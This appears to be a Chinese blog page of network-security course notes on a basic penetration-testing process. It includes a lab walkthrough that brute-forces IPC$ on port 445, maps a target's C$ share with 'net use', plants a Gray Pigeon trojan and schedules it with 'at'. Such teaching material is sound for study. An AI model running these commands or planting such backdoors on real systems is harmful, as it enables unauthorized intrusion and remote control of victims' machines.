《網路安全工程師筆記》 第十四章 滲透簡單測試流程

2021-10-19 05:21:34 字數 1261 閱讀 4756

注:本筆記來自溫曉飛老師的網路安全課程

第一章:虛擬化架構與系統部署

第三章:進製轉換

第四章:dos基本命令與批處理

第五章:使用者與組管理

第六章:伺服器遠端管理

第七章:ntfs安全許可權

第八章:檔案共享伺服器

第九章:dns部署與安全

第十章:dhcp部署與安全

第十一章:web伺服器和ftp伺服器

第十二章:域

第十三章:pki

第十四章:滲透簡單測試流程

第十五章:掃瞄與爆破

第十六章:osi與tcp-ip5層協議

第十七章:物理層(physical layer)

未完待續

0.授權

1.資訊收集

nslookup whois

2.掃瞄漏洞

namp=ip範圍 埠 80(iis,apache,什麼**)scanport

高階掃瞄:如iis漏洞2003-iis6.0 2008iis7.0

掃瞄**漏洞

3.漏洞利用

4.提權(shell環境、桌面環境、最高許可權)

5.毀屍滅跡(自首)

6.留後門(跟獄友搞好關係)

7.滲透測試報告(努力立功,爭取減刑出獄)

1.scanport掃瞄445埠

2.漏洞利用之ipc$:

進行暴力破解:ntscan(只能針對445埠進行暴力破解)

3.命令

net use f: \ \10.1.1.2\share 密碼 /user:使用者

net use f: /del

net use * /del

net use f: \ \10.1.1.2\c$ 密碼 /user:使用者

4.製作木馬

利用光碟上的灰鴿子軟體

5.植入木馬(留後門)

copy d:\heihei.exe \10.1.1.2\c$

6.設定計畫任務自動執行木馬

命令:net time \ \10.1.1.2

作用:檢視對方電腦時間

命令:at \ \10.1.1.2 11:11 「c:\heihei.exe」

作用:在對方電腦上定時啟動指定應用程式

7.等待肉雞上線

網路安全工程師筆記

一。基本的dos命令 1.建立檔案 1 echo類似cout echo 我帶你們大 echo a 路徑 建立檔案 echo start 路徑 開啟檔案 echo goto 路徑 轉到檔案 追加 覆蓋 2 copy con 檔名.txt 副檔名 編輯 ctrl z回車結束編寫 2.開啟檔案 1 dir...

《網路安全工程師筆記》 第十三章 PKI

注 本筆記來自溫曉飛老師的網路安全課程 第一章 虛擬化架構與系統部署 第三章 進製轉換 第四章 dos基本命令與批處理 第五章 使用者與組管理 第六章 伺服器遠端管理 第七章 ntfs安全許可權 第八章 檔案共享伺服器 第九章 dns部署與安全 第十章 dhcp部署與安全 第十一章 web伺服器和f...

網路安全工程師的初學路徑

網路技術 搜尋hcna ccna hcia關鍵字教程,課程大綱 至少包含 如下 以上學習完就有網路架構意識,下圖是乙個建議的學習框架 第二,了解vpn的配置教程,比如華為vpn的配置教程,其官網的技術支援官方配置文件可學習。技術包括vpn的加密原理 技術特點 應用場景。最後就做一下配置實驗。第三,以...